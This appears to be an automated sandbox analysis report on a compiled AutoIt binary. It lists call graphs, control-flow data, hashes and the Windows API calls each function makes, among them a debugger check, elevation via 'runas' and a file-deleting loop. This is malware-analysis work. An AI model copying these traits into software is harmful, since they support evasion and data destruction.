60 API calls 104800->104803 104806 133494 104800->104806 104802 173d22 104801->104802 104804 13b329 8 API calls 104802->104804 104803->104806 104805 173d30 104804->104805 104808 173d5f 104805->104808 104809 173d38 104805->104809 104807 1334af 104806->104807 104810 133907 Shell_NotifyIconW 104806->104810 104813 1334b6 SetCurrentDirectoryW 104807->104813 104812 136b7c 8 API calls 104808->104812 104811 136b7c 8 API calls 104809->104811 104810->104807 104814 173d43 104811->104814 104821 173d5b GetForegroundWindow ShellExecuteW 104812->104821 104816 1334ca 104813->104816 104817 137bb5 8 API calls 104814->104817 104816->104696 104819 173d51 104817->104819 104818 173d90 104818->104807 104820 136b7c 8 API calls 104819->104820 104820->104821 104821->104818 104822->104762 104826 163319 LeaveCriticalSection 104823->104826 104825 155311 104825->104764 104826->104825 104827->104769 104828->104771 104830 13bf73 8 API calls 104829->104830 104831 134fef 104830->104831 104935 1363d7 104831->104935 104833 13500d 104834 13bd57 8 API calls 104833->104834 104835 135021 104834->104835 104836 13bed9 8 API calls 104835->104836 104837 13502c 104836->104837 104838 13893c 8 API calls 104837->104838 104839 135038 104838->104839 104840 13b329 8 API calls 104839->104840 104841 135045 104840->104841 104842 13be2d 39 API calls 104841->104842 104843 135055 104842->104843 104844 13b329 8 API calls 104843->104844 104845 13507b 104844->104845 104846 13be2d 39 API calls 104845->104846 104847 13508a 104846->104847 104848 13bf73 8 API calls 104847->104848 104849 1350a8 104848->104849 104949 1351ca 104849->104949 104852 154d98 _strftime 40 API calls 104853 1350c2 104852->104853 104854 174b23 104853->104854 104855 1350cc 104853->104855 104856 1351ca 8 API calls 104854->104856 104857 154d98 _strftime 40 API calls 104855->104857 104858 174b37 104856->104858 104859 1350d7 104857->104859 104861 1351ca 8 API calls 104858->104861 104859->104858 104860 1350e1 104859->104860 104862 154d98 _strftime 40 API calls 104860->104862 104863 174b53 104861->104863 104864 1350ec 104862->104864 104867 135594 10 API calls 104863->104867 104864->104863 104865 1350f6 104864->104865 104866 154d98 _strftime 40 API calls 104865->104866 104868 135101 104866->104868 104869 174b76 104867->104869 104870 174b9f 104868->104870 104871 13510b 104868->104871 104872 1351ca 8 API calls 104869->104872 104874 1351ca 8 API calls 104870->104874 104873 13512e 104871->104873 104876 13bed9 8 API calls 104871->104876 104875 174b82 104872->104875 104878 174bda 104873->104878 104883 137e12 8 API calls 104873->104883 104877 174bbd 104874->104877 104879 13bed9 8 API calls 104875->104879 104881 135121 104876->104881 104882 13bed9 8 API calls 104877->104882 104880 174b90 104879->104880 104884 1351ca 8 API calls 104880->104884 104885 1351ca 8 API calls 104881->104885 104886 174bcb 104882->104886 104887 13513e 104883->104887 104884->104870 104885->104873 104888 1351ca 8 API calls 104886->104888 104889 138470 8 API calls 104887->104889 104888->104878 104890 13514c 104889->104890 104891 138a60 8 API calls 104890->104891 104894 135167 104891->104894 104892 13893c 8 API calls 104892->104894 104893 138a60 8 API calls 104893->104894 104894->104892 104894->104893 104895 1351ab 104894->104895 104896 1351ca 8 API calls 104894->104896 104895->104778 104896->104894 104898 133aa2 __wsopen_s 104897->104898 104899 133abb 104898->104899 104900 1740da ___scrt_fastfail 104898->104900 104901 135851 9 API calls 104899->104901 104903 1740f6 GetOpenFileNameW 104900->104903 104902 133ac4 104901->104902 104955 133a57 104902->104955 104905 174145 104903->104905 104906 138577 8 API calls 104905->104906 104908 17415a 104906->104908 104908->104908 104910 133ad9 104973 1362d5 104910->104973 105518 133624 7 API calls 104929->105518 104931 13347a 104932 1335b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104931->104932 104932->104800 104933->104789 104934->104796 104936 1363e4 __wsopen_s 104935->104936 104937 138577 8 API calls 104936->104937 104938 136416 104936->104938 104937->104938 104939 13655e 8 API calls 104938->104939 104944 13644c 104938->104944 104939->104938 104940 13b329 8 API calls 104941 136543 104940->104941 104943 136a7c 8 API calls 104941->104943 104942 13b329 8 API calls 104942->104944 104945 13654f 104943->104945 104944->104942 104946 136a7c 8 API calls 104944->104946 104947 13651a 104944->104947 104948 13655e 8 API calls 104944->104948 104945->104833 104946->104944 104947->104940 104947->104945 104948->104944 104950 1351f2 104949->104950 104951 1351d4 104949->104951 104953 138577 8 API calls 104950->104953 104952 1350b4 104951->104952 104954 13bed9 8 API calls 104951->104954 104952->104852 104953->104952 104954->104952 104956 1722d0 __wsopen_s 104955->104956 104957 133a64 GetLongPathNameW 104956->104957 104958 138577 8 API calls 104957->104958 104959 133a8c 104958->104959 104960 1353f2 104959->104960 104961 13bf73 8 API calls 104960->104961 104962 135404 104961->104962 104963 135851 9 API calls 104962->104963 104964 13540f 104963->104964 104965 13541a 104964->104965 104966 174d5b 104964->104966 104968 136a7c 8 API calls 104965->104968 104970 174d7d 104966->104970 105009 14e36b 41 API calls 104966->105009 104969 135426 104968->104969 105003 131340 104969->105003 104972 135439 104972->104910 105010 136679 104973->105010 105004 131352 105003->105004 105008 131371 __fread_nolock 105003->105008 105007 15017b 8 API calls 105004->105007 105005 15014b 8 API calls 105006 131388 105005->105006 105006->104972 105007->105008 105008->105005 105009->104966 105189 13663e LoadLibraryA 105010->105189 105190 136656 GetProcAddress 105189->105190 105191 136674 105189->105191 105192 136666 105190->105192 105194 15e95b 105191->105194 105192->105191 105193 13666d FreeLibrary 105192->105193 105193->105191 105226 15e89a 105194->105226 105229 15e8a6 CallCatchBlock 105226->105229 105518->104931

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 00135FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 461 135fc8-136037 call 13bf73 GetVersionExW call 138577 466 17507d-175090 461->466 467 13603d 461->467 468 175091-175095 466->468 469 13603f-136041 467->469 470 175097 468->470 471 175098-1750a4 468->471 472 136047-1360a6 call 13adf4 call 1355dc 469->472 473 1750bc 469->473 470->471 471->468 474 1750a6-1750a8 471->474 485 175224-17522b 472->485 486 1360ac-1360ae 472->486 477 1750c3-1750cf 473->477 474->469 476 1750ae-1750b5 474->476 476->466 480 1750b7 476->480 481 13611c-136136 GetCurrentProcess IsWow64Process 477->481 480->473 483 136195-13619b 481->483 484 136138 481->484 487 13613e-13614a 483->487 484->487 490 17522d 485->490 491 17524b-17524e 485->491 488 175125-175138 486->488 489 1360b4-1360b7 486->489 492 136150-13615f LoadLibraryA 487->492 493 175269-17526d GetSystemInfo 487->493 495 175161-175163 488->495 496 17513a-175143 488->496 489->481 497 1360b9-1360f5 489->497 494 175233 490->494 498 175250-17525f 491->498 499 175239-175241 491->499 500 136161-13616f GetProcAddress 492->500 501 13619d-1361a7 GetSystemInfo 492->501 494->499 506 175165-17517a 495->506 507 175198-17519b 495->507 503 175145-17514b 496->503 504 175150-17515c 496->504 497->481 505 1360f7-1360fa 497->505 498->494 508 175261-175267 498->508 499->491 500->501 509 136171-136175 GetNativeSystemInfo 500->509 502 136177-136179 501->502 516 136182-136194 502->516 517 13617b-13617c FreeLibrary 502->517 503->481 504->481 510 1750d4-1750e4 505->510 511 136100-13610a 505->511 512 175187-175193 506->512 513 17517c-175182 506->513 514 1751d6-1751d9 507->514 515 17519d-1751b8 507->515 508->499 509->502 522 1750f7-175101 510->522 523 1750e6-1750f2 510->523 511->477 519 136110-136116 511->519 512->481 513->481 514->481 518 1751df-175206 514->518 520 1751c5-1751d1 515->520 521 1751ba-1751c0 515->521 517->516 524 175213-17521f 518->524 525 175208-17520e 518->525 519->481 520->481 521->481 526 175114-175120 522->526 527 175103-17510f 522->527 523->481 524->481 525->481 526->481 527->481
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00135FF7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,001CDC2C,00000000,?,?), ref: 00136123
                                                                                                                                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 0013612A
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00136155
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00136167
                                                                                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00136175
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013617C
                                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 001361A1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                          • Opcode ID: f3b342313a9d7fe41d542e2d6a4aaf8cd4169691a7dbc21d1b043f2728df9cbf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 35a37eadcd53acc7a4f7d40540876aa844ecd9c76dd1ef26e0b507b03133a6b9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b342313a9d7fe41d542e2d6a4aaf8cd4169691a7dbc21d1b043f2728df9cbf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0A1A02280A3C4DFC716CB687C4E5A57FA5AB66300F28A8DBE48497223D37D458CCB35
                                                                                                                                                                                                                                                                                                          Function 0013338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00133368,?), ref: 001333BB
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00133368,?), ref: 001333CE
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00202418,00202400,?,?,?,?,?,?,00133368,?), ref: 0013343A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00133462,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001342A0
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001334BB
                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00173CB0
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00202418,?,?,?,?,?,?,?,00133368,?), ref: 00173CF1
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001F31F4,00202418,?,?,?,?,?,?,?,00133368), ref: 00173D7A
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00173D81
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: GetSysColorBrush.USER32(0000000F), ref: 001334DE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadCursorW.USER32(00000000,00007F00), ref: 001334ED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(00000063), ref: 00133503
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(000000A4), ref: 00133515
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(000000A2), ref: 00133527
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0013353F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: RegisterClassExW.USER32(?), ref: 00133590
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001335E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133602
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 00133616
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 0013361F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00133A3C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                                                          • API String ID: 683915450-554883960
                                                                                                                                                                                                                                                                                                          • Opcode ID: e58ee321864f607f732a4e605951cc3434fab87552a190efd950db894bd83478
                                                                                                                                                                                                                                                                                                          • Instruction ID: 361744cd5db1797a187fff961a1a34b21da7e9073b633efae8fb3eaf823f3a69
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e58ee321864f607f732a4e605951cc3434fab87552a190efd950db894bd83478
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3511770208344EEC715EF60EC49D6EBFB8AFA5744F04042EF5A1521A3DB348A8DD762
                                                                                                                                                                                                                                                                                                          Function 0019DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 2041 19dc54-19dc9b call 13bf73 * 3 call 135851 call 19eab0 2052 19dcab-19dcdc call 13568e FindFirstFileW 2041->2052 2053 19dc9d-19dca6 call 136b7c 2041->2053 2057 19dd4b-19dd52 FindClose 2052->2057 2058 19dcde-19dce0 2052->2058 2053->2052 2059 19dd56-19dd78 call 13bd98 * 3 2057->2059 2058->2057 2060 19dce2-19dce7 2058->2060 2062 19dce9-19dd24 call 13bed9 call 137bb5 call 136b7c DeleteFileW 2060->2062 2063 19dd26-19dd38 FindNextFileW 2060->2063 2062->2063 2076 19dd42-19dd49 FindClose 2062->2076 2063->2058 2064 19dd3a-19dd40 2063->2064 2064->2058 2076->2059
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0019DCCB
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DD1B
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0019DD2C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019DD43
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019DD4C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                          • Opcode ID: 469d91d73fa0f2a3473482b4a6ea6b1ea5572058a9dc5aa417a1bc375e4064a9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7a8a234eecb6a260b877a6deacd6201a8b1594f0f18149bf1a87a38a5dddad5c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 469d91d73fa0f2a3473482b4a6ea6b1ea5572058a9dc5aa417a1bc375e4064a9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77316E31008385AFC700EB64D8818EFBBE9BEA6704F444D6DF5D5821D1EB21DA09CB63
                                                                                                                                                                                                                                                                                                          Function 0019DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0019DDAC
                                                                                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0019DDBA
                                                                                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0019DDDA
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0019DE87
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 16937c055135629a01c71b3bdb847593b885c911e07eea3b78ea2f3559693d07
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ecd1dc4e57e51460b7ab3c233a5b80dd0d0507ec425158c7c44baff31cb1516
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16937c055135629a01c71b3bdb847593b885c911e07eea3b78ea2f3559693d07
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231AE71008300AFD710EF60D885AAFBBE8BFA9344F44092DF581871A1EB71DA49CB92
                                                                                                                                                                                                                                                                                                          Function 0014FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                          • Instruction ID: cedb68390ae074fda517455eb3e3b61494e0918e408b158aaa5f24b111795794
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231D770A00106DFCB1ACF98D590A69F7A5FF49381B6586A5E819CF292D732EDC5CBC0
                                                                                                                                                                                                                                                                                                          Function 0013EE30 Relevance: 26.9, APIs: 14, Strings: 1, Instructions: 630windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 0013EF07
                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0013F107
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F228
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0013F27B
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0013F289
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F29F
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0013F2B1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2189390790-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7cbf361b6e8590a434c23ca3ecd5271e3e9fd39a3008482019cef4b8b982b90c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 109672e46de8cf07a33c585a96a539cf6d4a4f86646c1e953c9313a88a789cb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cbf361b6e8590a434c23ca3ecd5271e3e9fd39a3008482019cef4b8b982b90c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84421630A04742DFD728DF24D888BAABBE5BF55304F14452DF5658B2A1D770E989CF82
                                                                                                                                                                                                                                                                                                          Function 0014AC3E Relevance: 23.4, APIs: 1, Strings: 12, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
